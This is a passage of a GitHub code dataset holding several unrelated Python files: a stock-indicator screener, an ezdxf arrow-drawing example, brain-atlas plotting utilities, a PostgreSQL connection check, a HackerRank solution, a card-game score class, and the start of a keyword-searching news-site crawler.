'STOCH_%D(5,3,3)': price_chart_df['STOCH_%D(5,3,3)'].iloc[-1],\n                   'RSI_14': price_chart_df['rsi_14'].iloc[-1],\n                   'ADX_plus_di' : price_chart_df['plus_di'].iloc[-1],\n                   'ADX' : price_chart_df['adx'].iloc[-1],\n                   'ADX_minus_di' : price_chart_df['minus_di'].iloc[-1],\n                   'OBV' : price_chart_df['OBV'].iloc[-1],\n                   'OBV_EMA' : price_chart_df['OBV_EMA'].iloc[-1],\n                   }\n            df_EMA = df_EMA.append(df1_EMA, ignore_index=True)\n\n\n    except Exception as e:\n        print(e)\n\n\n\n# sort the screener results by RSI_14, lowest values at the top\nif 'RSI_14' in df_SMA:\n    df_SMA = df_SMA.sort_values(by=['RSI_14'])\nif 'RSI_14' in df_EMA:\n    df_EMA = df_EMA.sort_values(by=['RSI_14'])\n\n\nif 'ADX' in df_ADX:\n    df_ADX = df_ADX.sort_values(by=['ADX'], ascending=False)\n\nif 'RSI_14' in df_RSI:\n    df_RSI = df_RSI.sort_values(by=['RSI_14'], ascending=True)\n\ndf_expected_yearly_return = df_expected_yearly_return.sort_values(by=['yearly_return'], ascending=False)\n\n\ntext = 'Attached is the CSV file'\nemail_df_SMA = df_SMA.to_html()\ndf_SMA.to_csv('SMA_History.csv', mode='a', header=False)\nemail_df_EMA = df_EMA.to_html()\nemail_df_ADX = df_ADX.to_html()\nemail_df_RSI = df_RSI.to_html()\nemail_df_expected_yearly_return = df_expected_yearly_return.to_html()\n\n# send_email(SMA_screened_list, 'SMA_Screener_today')\nsend_email(text, 'SMA_Screener_table_today', attachment=email_df_SMA)\nsend_email(text, 'EMA_Screener_table_today', attachment=email_df_EMA)\nsend_email(text, 'ADX >= 40', attachment=email_df_ADX)\nsend_email(text, 'RSI <= 35', attachment=email_df_RSI)\nsend_email(text, 'Expected Yearly Return', attachment=email_df_expected_yearly_return)\n\nend_time = datetime.datetime.now()\nprint('start time - {} \\n end time - {}'.format(start_time, end_time))\n","repo_name":"sudhirz/Algo_Trading_Analysis","sub_path":"stock_screener_main.py","file_name":"stock_screener_main.py","file_ext":"py","file_size_in_byte":17168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70791030888","text":"import ezdxf\n\ndoc = ezdxf.new('R2007', setup=True)\nmsp = doc.modelspace()\ny = 0\n\nfor index, name in enumerate(sorted(ezdxf.ARROWS.__all_arrows__)):\n    if name == \"\":\n        label = '\"\" = closed filled'\n    else:\n        label = name\n    y = index * 2\n\n    def add_connection_point(p):\n        msp.add_circle(p, radius=0.01, dxfattribs={'color': 1})\n    msp.add_text(label, {'style': 'OpenSans', 'height': .25}).set_pos((-5, y - .5))\n    msp.add_line((-5, y), (-1, y))\n    msp.add_line((5, y), (10, y))\n    # left side |<- is the reverse orientation\n    cp1 = msp.add_arrow(name, insert=(0, y), size=1, rotation=180, dxfattribs={'color': 7})\n    # right side ->| is the base orientation\n    cp2 = msp.add_arrow(name, insert=(4, y), size=1, rotation=0, dxfattribs={'color': 7})\n    msp.add_line(cp1, cp2)\n    add_connection_point(cp1)\n    add_connection_point(cp2)\n\n    add_connection_point(msp.add_arrow_blockref(name, insert=(7, y), size=.3, rotation=45))\n    add_connection_point(msp.add_arrow_blockref(name, insert=(7.5, y), size=.3, rotation=135))\n    add_connection_point(msp.add_arrow_blockref(name, insert=(8, y), size=.5, rotation=-90))\n\n\nmsp.add_line((0, 0), (0, y))\nmsp.add_line((4, 0), (4, y))\nmsp.add_line((8, 0), (8, y))\n\ndoc.saveas('all_arrows_{}.dxf'.format(doc.acad_release))\n","repo_name":"DatacloudIntl/dc_ezdxf","sub_path":"examples/render/show_all_arrows.py","file_name":"show_all_arrows.py","file_ext":"py","file_size_in_byte":1293,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
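The get_rsi helper in the screener record above smooths gains and losses with an exponentially weighted mean (com = lookback - 1, i.e. Wilder's smoothing) before forming RS = average gain / average loss. A small self-contained sketch of the same formula on made-up closing prices (values are illustrative only; com=13 mirrors the screener's lookback of 14):

import pandas as pd

close = pd.Series([44.0, 44.5, 44.2, 44.9, 45.4, 45.1, 45.8, 46.0])
delta = close.diff()
gain = delta.clip(lower=0).ewm(com=13, adjust=False).mean()     # smoothed average gain
loss = (-delta.clip(upper=0)).ewm(com=13, adjust=False).mean()  # smoothed average loss
rsi = 100 - 100 / (1 + gain / loss)                             # RSI = 100 - 100/(1+RS)
print(rsi.round(2).tolist())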
+{"seq_id":"28307839681","text":"import matplotlib\nmatplotlib.use('Agg')\n\nimport numpy as np\nimport pylab as pl\nimport nibabel as nb\n\n# Utilities for colormaps\nfrom matplotlib import cm as _cm\nfrom matplotlib import colors as _colors\n\nfrom scipy.stats import scoreatpercentile\nfrom sklearn.preprocessing import StandardScaler\nfrom nilearn.image.image import _smooth_array\nfrom nipy.labs.viz import plot_map\nfrom nipy.labs.viz_tools import cm\nfrom nipy.labs.viz_tools import anat_cache\n\n\ndef alpha_cmap(color):\n \"\"\" Return a colormap with the given color, and alpha going from\n zero to 1.\n \"\"\"\n red, green, blue = color[:3]\n cmapspec = [(red, green, blue, 0.),\n (red, green, blue, 1.),\n ]\n cmap = _colors.LinearSegmentedColormap.from_list(\n 'alpha', cmapspec, _cm.LUTSIZE)\n cmap._init()\n cmap._lut[:, -1] = np.linspace(.5, .75, cmap._lut.shape[0])\n cmap._lut[-1, -1] = 0\n return cmap\n\n\ndef plot_bg(cut_coords=None, title=None):\n anat, anat_affine, anat_max = anat_cache._AnatCache.get_anat()\n figure = pl.figure(figsize=(8, 2.6), facecolor='w', edgecolor='w')\n ax = pl.axes([.0, .0, .85, 1], axisbg='w')\n slicer = plot_map(anat,\n anat_affine,\n cmap=pl.cm.gray,\n vmin=.1 * anat_max,\n vmax=.8 * anat_max,\n figure=figure,\n cut_coords=cut_coords,\n axes=ax, )\n slicer.annotate()\n slicer.draw_cross()\n if title:\n slicer.title(title, x=.05, y=.9)\n return slicer\n\n\ndef plot_contour_atlas(niimgs, labels, cut_coords=None,\n title=None, percentile=99):\n legend_lines = []\n slicer = plot_bg(cut_coords, title)\n atlas = np.vstack([niimg.get_data()[np.newaxis] for niimg in niimgs])\n # atlas = StandardScaler().fit_transform(atlas.T).T\n affine = niimgs[0].get_affine()\n for i, (label, data) in enumerate(zip(labels, atlas)):\n data = np.array(_smooth_array(data, affine, 5), copy=True)\n data[data < 0] = 0\n color = np.array(pl.cm.Set1(float(i) / (len(labels) - 1)))\n # data, affine = niimg.get_data(), niimg.get_affine()\n # affine = niimg.get_affine()\n level = scoreatpercentile(data.ravel(), percentile)\n slicer.contour_map(data, affine, levels=(level, ),\n linewidth=2.5, colors=(color, ))\n slicer.plot_map(data, affine, threshold=level,\n cmap=alpha_cmap(color))\n legend_lines.append(pl.Line2D([0, 0], [0, 0],\n color=color, linewidth=4))\n\n ax = slicer.axes['z'].ax.get_figure().add_axes([.80, .1, .15, .8])\n pl.axis('off')\n ax.legend(legend_lines, labels, loc='center right',\n prop=dict(size=4), title='Labels',\n borderaxespad=0,\n bbox_to_anchor=(1 / .85, .5))\n atlas = np.rollaxis(atlas, 0, 4)\n return nb.Nifti1Image(atlas, affine=affine)\n\n\ndef plot_label_atlas(niimgs, labels, cut_coords=None, title=None):\n slicer = plot_bg(cut_coords, title)\n n_maps = len(niimgs)\n\n data = np.array([niimg.get_data() for niimg in niimgs])\n affine = niimgs[0].get_affine()\n mask = np.any(data, axis=0)\n atlas = np.zeros(mask.shape, dtype='int')\n # atlas[mask] = np.argmax(np.abs(data), axis=0)[mask]\n atlas[mask] = np.argmax(data, axis=0)[mask] + 1\n colors = (np.arange(n_maps) + 1) / float(n_maps)\n colors = np.hstack([colors, [0]])\n slicer.plot_map(np.ma.masked_equal(colors[atlas], 0),\n affine,\n cmap=pl.cm.spectral, )\n\n legend_lines = [pl.Line2D([0, 0], [0, 0],\n color=pl.cm.spectral(color), linewidth=4)\n for color in colors]\n\n ax = slicer.axes['z'].ax.get_figure().add_axes([.80, .1, .15, .8])\n pl.axis('off')\n ax.legend(legend_lines, labels, loc='center right',\n prop=dict(size=4), title='Labels',\n borderaxespad=0,\n bbox_to_anchor=(1 / .85, .5))\n return 
nb.Nifti1Image(atlas, affine=affine)\n\n\nif __name__ == '__main__':\n import os\n import glob\n import nibabel as nb\n\n data_dir = '/tmp/reporter'\n niimgs = [nb.load(img)\n for img in glob.glob(os.path.join(data_dir, '*.nii.gz'))]\n labels = [os.path.split(img)[1].split('.nii.gz')[0]\n for img in glob.glob(os.path.join(data_dir, '*.nii.gz'))]\n # plot_contour_atlas(niimgs, labels, (61, -20, 3), 'atlas', 99)\n plot_label_atlas(niimgs, labels, (61, -20, 3), 'atlas')\n\n pl.show()\n","repo_name":"schwarty/nignore","sub_path":"viz_utils.py","file_name":"viz_utils.py","file_ext":"py","file_size_in_byte":4589,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38100316663","text":"import os\nfrom dotenv import load_dotenv, find_dotenv\nimport psycopg2\nimport sys\n\ndef ConnectDB_Checker():\n \n ValueResponse = \"OK\"\n \n load_dotenv(find_dotenv()) \n try: \n conn = psycopg2.connect( \n user = os.getenv(\"DATABASE_USERNAME\"), \n password = os.getenv(\"DATABASE_PASSWORD\"), \n host = os.getenv(\"DATABASE_IP\"), \n port = os.getenv(\"DATABASE_PORT\"), \n database = os.getenv(\"DATABASE_NAME\") \n )\n conn.close()\n except psycopg2.Error as e:\n ValueResponse = e\n print(e)\n # sys.exit(1)\n\n # # Execute a SQL query\n # try:\n # cur = conn.cursor()\n # cur.execute('SELECT version()')\n # except psycopg2.Error as e:\n # ValueResponse = e\n # print(e)\n # sys.exit(1)\n\n # # Fetch the results\n # try:\n # rows = cur.fetchall()\n # except psycopg2.Error as e:\n # ValueResponse = e\n # print(e)\n # sys.exit(1)\n\n # # Close the connection\n # try:\n # conn.close()\n # except psycopg2.Error as e:\n # ValueResponse = e\n # print(e)\n # sys.exit(1)\n\n return ValueResponse","repo_name":"FlorentBch/ProjetEntrepriseMaritime","sub_path":"Application/DataBase/CheckerDB.py","file_name":"CheckerDB.py","file_ext":"py","file_size_in_byte":1463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36404199027","text":"#https://www.hackerrank.com/challenges/journey-to-the-moon/problem\n\ndef find_set_index(a):\n for i in range(len(a_set_list)):\n if a in a_set_list[i]:\n return i\n\ndef journeyToMoon(n, astronaut):\n for a1, a2 in astronaut:\n i1, i2 = find_set_index(a1), find_set_index(a2)\n if i1 != i2:\n a_set_list[i1] = a_set_list[i1].union(a_set_list[i2])\n del a_set_list[i2]\n print(a_set_list)\n sum, res = 0, 0\n for s in a_set_list:\n res += sum * len(s)\n sum += len(s)\n print(res, sum)\n return res\n\nn, p = map(int, input().split())\n\nastronauts = []\nfor _ in range(p):\n astronauts.append(list(map(int, input().split())))\n\na_set_list = [{x} for x in range(n)]\nresult = journeyToMoon(n, astronauts)\nprint(result)","repo_name":"graygreat/algorithm-study","sub_path":"HackerRank/JourneyToTheMoon.py","file_name":"JourneyToTheMoon.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21750079666","text":"from relative_data import RelativeData\n\n\nclass Score(RelativeData):\n\n\tdef __init__(self, reference_id=0, playing_to=500):\n\t\tsuper().__init__(reference_id)\n\t\tself.data = {0: 0, 1: 0}\n\t\tself.score = self.data\n\t\tself.data_size = 2\n\t\tself.playing_to = playing_to\n\n\tdef add_score(self, new_score, team_id):\n\t\t\"\"\"\"Add points to a team's score.\"\"\"\n\t\tglobal_id = self.globalize_id(team_id)\n\t\tself.score[global_id] += new_score\n\n\tdef can_blind(self, 
player_id):\n\t\t\"\"\"\"Return whether the team of this player is eligible for a Blind Nill this round\"\"\"\n\t\tglobal_team_id = self.globalize_id(player_id)\n\t\tother_team_id = self.globalize_id(player_id + 1)\n\t\treturn self.score[global_team_id] <= self.score[other_team_id] - 100\n\n\tdef get_winner(self, intermediate_winner=False):\n\t\t\"\"\"Return the team that won the match, if any\"\"\"\n\t\tif intermediate_winner or not (-self.playing_to < self.score[0] < self.playing_to) or not (-self.playing_to < self.score[1] < self.playing_to):\n\t\t\tif self.score[0] == self.score[1]:\n\t\t\t\treturn None\n\t\t\treturn max(self.score, key=lambda team_id: self.score[team_id])\n\t\treturn None\n\n\tdef __str__(self):\n\t\tteam_0_id = self.localize_id(0)\n\t\tteam_1_id = self.localize_id(1)\n\t\treturn \"Scores: Team 0: \" + str(self.score[team_0_id]) + \" Team 1: \" + str(self.score[team_1_id])\n\n\n","repo_name":"Metamess/Spades","sub_path":"score.py","file_name":"score.py","file_ext":"py","file_size_in_byte":1285,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"25046580562","text":"# websiteTxtSearcher.py\r\n# Searches a website recursively for any given string.\r\n# FB - 201009105\r\nimport urllib.request\r\nfrom os.path import basename\r\nfrom bs4 import BeautifulSoup\r\nfrom urllib.parse import urlparse\r\nimport logging\r\nimport datetime\r\nimport traceback\r\nimport pymongo\r\nfrom pymongo import MongoClient\r\nimport time\r\nimport sys\r\nimport config\r\nimport re\r\n\r\n# recursively search starting from the root URL\r\ndef searchUrl(url, level, keywords, rootUrl , urlListProbed , document , db): # the root URL is level 0\r\n # do not go to other websites\r\n\to = urlparse(url)\r\n\tlogging.getLogger().info(o.geturl())\r\n\tif o.netloc.find(rootUrl) < 0:\r\n\t\treturn\r\n\r\n\tif url in urlListProbed: # prevent using the same URL again\r\n\t\treturn\r\n\r\n\ttry:\r\n\t\turlListProbed.append(url)\r\n\t\tif config.mode == \"test\":\r\n\t\t\tprint(\"Processing URL: \" + o.geturl())\r\n\t\tif is_url_visited(url , db) == False:\r\n\t\t\treq = urllib.request.Request(url , headers={'User-Agent': 'Mozilla/5.0 (X11; U; Linux i686) Gecko/20071127 Firefox/2.0.0.11'})\r\n\t\t\turlContent = urllib.request.urlopen(req).read()\r\n\t\telse:\r\n\t\t\tprint(\"url already visited : \" + o.geturl())\r\n\t\t\treturn\r\n\r\n\texcept Exception as e:\r\n\t\tlogging.getLogger().exception(o.geturl())\r\n\t\treturn\r\n\r\n\tsoup = BeautifulSoup(urlContent, \"lxml\")\r\n\t\r\n\t# remove script tags\r\n\tc = soup.find_all('script')\r\n\tfor i in c:\r\n\t\ti.extract() \r\n\r\n\tresult = None\r\n\tif rootUrl == 'indianexpress.com':\r\n\t\tresult = searchIndianExpress(soup , keywords )\r\n\telif rootUrl == 'www.thehindu.com':\r\n\t\tresult = searchTheHindu(soup , keywords )\r\n\telif rootUrl == 'timesofindia.indiatimes.com':\r\n\t\tresult = searchTOI(soup , keywords)\r\n\telif rootUrl == 'www.aninews.in':\r\n\t\tresult = searchANINews(soup , keywords)\r\n\telif rootUrl == 'www.newindianexpress.com':\r\n\t\tresult = searchNewindianexpress(soup , keywords)\r\n\telif rootUrl == 'zeenews.india.com':\r\n\t\tresult = searchZeeNews(soup , keywords)\r\n\telif rootUrl.find('dnaindia.com') >=0 :\r\n\t\tresult = searchDNAIndia(soup , keywords)\r\n\telif rootUrl == 'www.sundayguardianlive.com':\r\n\t\tresult = searchSundayGuardin(soup , keywords)\r\n\telif rootUrl == 'www.hindustantimes.com':\r\n\t\tresult = searchHindustanTimes(soup , keywords)\r\n\telif 
rootUrl == 'www.theguardian.com':\r\n\t\tresult = searchTheGuardian(soup , keywords)\r\n\telif rootUrl == 'www.ndtv.com':\r\n\t\tresult = searchNDTV(soup , keywords)\r\n\telif rootUrl == 'www.mid-day.com':\r\n\t\tresult = searchMidDay(soup , keywords)\r\n\telif rootUrl == 'www.news18.com':\r\n\t\tresult = searchNews18(soup , keywords)\r\n\telif rootUrl == 'www.opindia.com':\r\n\t\tresult = searchOpIndia(soup , keywords)\r\n\telif rootUrl == 'www.livemint.com':\r\n\t\tresult = searchLiveMint(soup , keywords)\r\n\telif rootUrl == 'www.sirfnews.com':\r\n\t\tresult = searchSirfNews(soup , keywords)\r\n\telif rootUrl.find('in.reuters.com') >= 0:\r\n\t\tresult = searchReuters(soup , keywords)\r\n\telif rootUrl.find('swarajyamag.com') >= 0:\r\n\t\tresult = searchSwarajya(soup , keywords)\r\n\telif rootUrl == 'currentriggers.com':\r\n\t\tresult = searchCurrentRiggers(soup , keywords)\r\n\telif rootUrl == 'satyavijayi.com':\r\n\t\tresult = searchSatyaVijayi(soup , keywords)\r\n\telif rootUrl == 'www.hindupost.in':\r\n\t\tresult = searchHinduPost(soup , keywords)\r\n\telif rootUrl.find('simplecapacity.com') >= 0:\r\n\t\tresult = searchSimpleCapacity(soup , keywords)\r\n\telif rootUrl == 'www.worldreligionnews.com':\r\n\t\tresult = searchWorldReligionNews(soup , keywords)\r\n\telif rootUrl == 'worldhindunews.com':\r\n\t\tresult = searchWorldHinduNews(soup , keywords)\r\n\telif rootUrl == 'www.dailyo.in':\r\n\t\tresult = searchDailyo(soup , keywords)\r\n\telif rootUrl == 'www.avenuemail.in':\r\n\t\tresult = searchAvenuemaol(soup , keywords)\r\n\telif rootUrl == 'hinduexistence.org':\r\n\t\tresult = searchHinduExistence(soup , keywords)\r\n\telif rootUrl == 'www.hinduhumanrights.info':\r\n\t\tresult = searchHinduHumanRights(soup , keywords)\r\n\telif rootUrl == 'www.hindujagruti.org':\r\n\t\tresult = searchHinduJagruti(soup , keywords)\r\n\telif rootUrl == 'www.mediacrooks.com':\r\n\t\tresult = searchMediaCrooks(soup , keywords)\r\n\telif rootUrl == 'deccanherald.com':\r\n\t\tresult = searchDeccanHerald(soup , keywords)\t\r\n\telif rootUrl == 'deccanchronicle.com':\r\n\t\tresult = searchDeccanChronicle(soup , keywords)\t\r\n\telif rootUrl == 'business-standard.com':\r\n\t\tresult = searchBusinessStandard(soup , keywords)\r\n\telif rootUrl.find('thehindubusinessline.com') >=0 :\r\n\t\tresult = searchHinduBusinessLine(soup , keywords)\t\r\n\telif rootUrl == 'telegraphindia.com':\r\n\t\tresult = searchTelegraph(soup , keywords)\t\r\n\telif rootUrl == 'economictimes.indiatimes.com':\r\n\t\tresult = searchEconomicTimes(soup , keywords)\r\n\telif rootUrl == 'www.firstpost.com':\r\n\t\tresult = searchFirstPost(soup , keywords)\r\n\telif rootUrl == 'dailypost.in':\r\n\t\tresult = searchDailyPost(soup , keywords)\r\n\telif rootUrl == 'bangaloremirror.com':\r\n\t\tresult = searchBangaloreMirror(soup , keywords)\r\n\telif rootUrl == 'tribuneindia.com':\r\n\t\tresult = searchTribuneIndia(soup , keywords)\r\n\telif rootUrl == 'asianage.com':\r\n\t\tresult = searchAsianAge(soup , keywords)\r\n\telif rootUrl == 'scroll.in':\r\n\t\tresult = searchScroll(soup , keywords)\r\n\telif rootUrl == 'telanganatoday.com':\r\n\t\tresult = searchTelanganaToday(soup , keywords)\r\n\telif rootUrl == 'www.thebetterindia.com':\r\n\t\tresult = searchBetterIndia(soup , keywords)\r\n\telif rootUrl == 'financialexpress.com':\r\n\t\tresult = searchFinancialExpress(soup , keywords)\r\n\telif rootUrl == 'freepressjournal.in':\r\n\t\tresult = searchFreePressJournal(soup , keywords)\r\n\telif rootUrl == 'www.greaterkashmir.com':\r\n\t\tresult 
= searchGreaterKashmirJournal(soup , keywords)\r\n\telif rootUrl == 'mumbaimirror.com':\r\n\t\tresult = searchMumbaiMirror(soup , keywords)\r\n\telif rootUrl == 'www.nagalandpost.com':\r\n\t\tresult = searchNagalandPost(soup , keywords)\r\n\telif rootUrl == 'www.dailypioneer.com':\r\n\t\tresult = searchDailyPioneer(soup , keywords)\r\n\telif rootUrl == 'news.statetimes.in':\r\n\t\tresult = searchStateTimes(soup , keywords)\r\n\telif rootUrl == 'www.starofmysore.com':\r\n\t\tresult = searchStarOfMysore(soup , keywords)\r\n\telif rootUrl == 'www.navhindtimes.in':\r\n\t\tresult = searchNacHindTimes(soup , keywords)\r\n\telif rootUrl == 'morungexpress.com':\r\n\t\tresult = searchMorungExpress(soup , keywords)\t\r\n\telif rootUrl == 'newstodaynet.com':\r\n\t\tresult = searchNewsTodayNet(soup , keywords)\t\r\n\telif rootUrl == 'theshillongtimes.com':\r\n\t\tresult = searchTheShillongTimes(soup , keywords)\t\r\n\telif rootUrl == 'www.newsgram.com':\r\n\t\tresult = searchNewsGram(soup , keywords)\r\n\telif rootUrl == 'www.pacifiermedia.com':\r\n\t\tresult = searchPacificMedia(soup , keywords)\r\n\telif rootUrl == 'www.haindavakeralam.com':\r\n\t\tresult = searchHaindavakeralam(soup , keywords)\r\n\telif rootUrl == 'says.com':\r\n\t\tresult = searchSays(soup , keywords)\r\n\telif rootUrl == 'www.chakranews.com':\r\n\t\tresult = searchChakraNews(soup , keywords)\r\n\telif rootUrl == 'www.mysteryofindia.com':\r\n\t\tresult = searchMysteryOfIndia(soup , keywords)\r\n\telif rootUrl == 'dharmatoday.com':\r\n\t\tresult = searchDharmaToday(soup , keywords)\r\n\telif rootUrl == 'postcard.news':\r\n\t\tresult = searchPostcardNews(soup , keywords)\r\n\telif rootUrl == 'www.thehansindia.com':\r\n\t\tresult = searchHansIndia(soup , keywords)\r\n\telse:\r\n\t\tprint(\"This specific site is yet to be implemented \" + rootUrl)\r\n\t\treturn\r\n\t\r\n\t#\".\" is not a valid character for a field name in mongo\r\n\tkey = rootUrl.replace(\".\" , \"_\")\r\n\t# Check if the key for this rootUrl exists\r\n\tif key not in document:\r\n\t\tsiteDetail = {}\r\n\t\tsiteDetail[\"key_match_count\"] = 0\r\n\t\tsiteDetail[\"tag_match_count\"] = 0\r\n\t\tsiteDetail[\"children\"] = []\r\n\t\tdocument[key] = siteDetail\r\n\telse:\r\n\t\tsiteDetail = document[key]\r\n\r\n\tif result[\"tag_match\"] == True:\r\n\t\tsiteDetail[\"tag_match_count\"] = siteDetail[\"tag_match_count\"] + 1\r\n\t\t#Only mark the URLs as visited if there is a tag match. 
This is to avoid the scenario of skipping\r\n\t\t# the main website for every successive run\r\n\t\tmark_url_visited(url , db)\r\n\t\r\n\tif result[\"keyword_match\"] == True:\r\n\t\tlog_result(url)\r\n\t\tsiteDetail[\"key_match_count\"] = siteDetail[\"key_match_count\"] + 1 \r\n\t\turlDetail = {}\r\n\t\turlDetail[\"link\"] = url\r\n\t\turlDetail[\"headline\"] = result[\"headline\"]\r\n\t\turlDetail[\"author\"] = result[\"author\"]\r\n\t\tsiteDetail[\"children\"].append(urlDetail)\r\n\t\t\t\r\n    # if there are links on the webpage then recursively repeat\r\n\tif level > 0:\r\n\t\tlinkTags = soup.find_all('a')\r\n\t\tif len(linkTags) > 0:\r\n\t\t\tfor linkTag in linkTags:\r\n\t\t\t\ttry:\r\n\t\t\t\t\tlinkUrl = linkTag['href']\r\n\t\t\t\t\tif linkUrl.startswith(\"http\") == False:\r\n\t\t\t\t\t\tif linkUrl[0] == '/':\r\n\t\t\t\t\t\t\tlinkUrl = o.scheme + \"://\" + rootUrl + linkUrl\r\n\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\tlinkUrl = o.scheme + \"://\" + rootUrl +\"/\"+ linkUrl\r\n\t\t\t\t\tsearchUrl(linkUrl, level - 1, keywords , rootUrl , urlListProbed , document , db)\r\n\t\t\t\texcept:\r\n\t\t\t\t\tpass\r\n\r\ndef searchIndianExpress(soup , keywords):\r\n\tresult = init_result()\r\n\ttry:\r\n\t\tschema = soup.find(\"html\" , itemtype='http://schema.org/Article')\r\n\t\theadlines = soup.find_all(\"h1\" , itemprop=\"headline\")\r\n\t\tif schema is not None and len(headlines) == 1:\r\n\t\t\tresult[\"tag_match\"] = True\r\n\t\t\tif(genSearchParagraph(soup.find_all(\"p\") , keywords) is not None):\r\n\t\t\t\tresult[\"keyword_match\"] = True\r\n\t\t\t\tresult[\"headline\"] = headlines[0].get_text()\r\n\t\t\t\tauthor = soup.find_all(\"div\" , class_=\"editor\")\r\n\t\t\t\tresult[\"author\"] = author[0].get_text()\r\n\t\t\t\tresult[\"author\"] = result[\"author\"].replace(\"\\n\" , \" \")\r\n\t\t\t\tresult[\"author\"] = result[\"author\"].replace(\"\\t\" , \"\")\r\n\texcept:\r\n\t\tlogging.getLogger().exception(\"\")\r\n\treturn result\r\n\t\r\ndef searchTheHindu(soup , keywords):\r\n\tresult = init_result()\r\n\ttry:\r\n\t\tt = soup.find(\"div\",class_=\"article-topics-container\")\r\n\t\tif t is not None:\r\n\t\t\tresult[\"tag_match\"] = True\r\n\t\t\tparagraphs = soup.find_all(\"p\")\r\n\t\t\tfor p in paragraphs:\r\n\t\t\t\tif len(p.attrs) > 0:\r\n\t\t\t\t\tcontinue\r\n\t\t\t\tfor searchText in keywords:\r\n\t\t\t\t\tif(p.get_text().find(searchText)) > -1 :\r\n\t\t\t\t\t\tresult[\"keyword_match\"] = True\r\n\t\t\t\t\t\treturn result\r\n\texcept:\r\n\t\tlogging.getLogger().exception(\"\")\r\n\treturn result\r\n\t\t\t\t\r\ndef searchTOI(soup , keywords):\r\n\tresult = init_result()\r\n\ttry:\r\n\t\tschema = soup.find(\"html\" , itemtype='https://schema.org/NewsArticle')\r\n\t\tif schema is not None:\r\n\t\t\tresult[\"tag_match\"] = True\r\n\t\t\tcontent_text = (soup.find(\"div\" , itemprop=\"articleBody\")).get_text()\r\n\t\t\tfor searchText in keywords:\r\n\t\t\t\tif(content_text.find(searchText)) > -1 :\r\n\t\t\t\t\tresult[\"keyword_match\"] = True\r\n\t\t\t\t\tbreak\r\n\texcept:\r\n\t\tlogging.getLogger().exception(\"\")\r\n\treturn result\r\n\r\ndef searchANINews(soup , keywords):\r\n\tresult = init_result()\r\n\ttry:\r\n\t\tart = soup.find(\"article\")\r\n\t\tif art is not None:\r\n\t\t\tresult[\"tag_match\"] = True\r\n\t\t\tcontent_text = art.get_text()\r\n\t\t\tfor searchText in keywords:\r\n\t\t\t\tif(content_text.find(searchText)) > -1 :\r\n\t\t\t\t\tresult[\"keyword_match\"] = True\r\n\texcept:\r\n\t\tlogging.getLogger().exception(\"\")\r\n\treturn result\r\n\t\r\ndef 
def searchNewindianexpress(soup , keywords):\r\n\treturn searchPage1(soup , keywords , \"article\" , {})\r\n\r\ndef searchPage(soup , keywords , elementTag , filters , lengthCheck=None):\r\n\tresult = init_result()\r\n\ttry:\r\n\t\tif isinstance(filters , dict) :\r\n\t\t\tcontent = soup.find_all(elementTag , filters)\r\n\t\telif isinstance(filters , str) :\r\n\t\t\tcontent = soup.select(filters)\r\n\t\tif lengthCheck is None and len(content) != 0:\r\n\t\t\tresult[\"tag_match\"] = True\r\n\t\telif len(content) == lengthCheck:\r\n\t\t\tresult[\"tag_match\"] = True\r\n\t\tif result[\"tag_match\"] == True:\r\n\t\t\tparagraphs = content[0].find_all(\"p\")\r\n\t\t\tif genSearchParagraph(paragraphs , keywords) is not None:\r\n\t\t\t\tresult[\"keyword_match\"] = True\r\n\texcept:\r\n\t\tlogging.getLogger().exception(\"\")\r\n\ts = \"elementTag: \" + str(elementTag) + \" filters: \" + str(filters) + \" lengthCheck:\" + str(lengthCheck)\r\n\tlogging.getLogger().info(s)\r\n\treturn result\r\n\r\n# Does not get the paragraphs, rather searches the elements themselves\r\ndef searchPage1(soup , keywords , elementTag , filters):\r\n\tresult = init_result()\r\n\ttry:\r\n\t\tif isinstance(filters , dict) :\r\n\t\t\tcontent = soup.find_all(elementTag , filters)\r\n\t\telif isinstance(filters , str) :\r\n\t\t\tcontent = soup.select(filters)\r\n\t\tif len(content) != 0 :\r\n\t\t\tresult[\"tag_match\"] = True\r\n\t\t\tif genSearchParagraph(content , keywords) is not None:\r\n\t\t\t\tresult[\"keyword_match\"] = True\r\n\texcept:\r\n\t\tlogging.getLogger().exception(\"\")\r\n\treturn result\r\n\r\ndef searchPage2(soup , keywords , elementTag , filters , paragraphFilterText):\r\n\tresult = init_result()\r\n\ts = \"elementTag: \" + str(elementTag) + \" filters: \" + str(filters) + \" paragraphFilterText:\" + str(paragraphFilterText)\r\n\tlogging.getLogger().info(s)\r\n\r\n\ttry:\r\n\t\tif isinstance(filters , dict) :\r\n\t\t\tcontent = soup.find_all(elementTag , filters)\r\n\t\telif isinstance(filters , str) :\r\n\t\t\tcontent = soup.select(filters)\r\n\t\tif len(content) != 0 :\r\n\t\t\tresult[\"tag_match\"] = True\r\n\t\t\tparagraphs = filterParagraphs(content[0].find_all(\"p\") , paragraphFilterText)\r\n\t\t\tif genSearchParagraph(paragraphs , keywords) is not None:\r\n\t\t\t\tresult[\"keyword_match\"] = True\r\n\texcept:\r\n\t\tlogging.getLogger().exception(\"\")\r\n\treturn result\r\n\t\r\ndef searchPage4(soup , keywords , elementTag , filters , lengthCheck=None):\r\n\tresult = init_result()\r\n\ttry:\r\n\t\tif isinstance(filters , dict) :\r\n\t\t\tcontent = soup.find_all(elementTag , filters)\r\n\t\telif isinstance(filters , str) :\r\n\t\t\tcontent = soup.select(filters)\r\n\t\tif lengthCheck is None and len(content) != 0:\r\n\t\t\tresult[\"tag_match\"] = True\r\n\t\telif len(content) == lengthCheck:\r\n\t\t\tresult[\"tag_match\"] = True\r\n\t\tif result[\"tag_match\"] == True:\r\n\t\t\tif genSearchParagraph(content , keywords) is not None:\r\n\t\t\t\tresult[\"keyword_match\"] = True\r\n\texcept:\r\n\t\tlogging.getLogger().exception(\"\")\r\n\treturn result\r\n\t\r\ndef searchZeeNews(soup , keywords):\r\n\treturn searchPage(soup , keywords , \"section\" , {\"class\": 'main-article'})\r\n\r\ndef searchDNAIndia(soup , 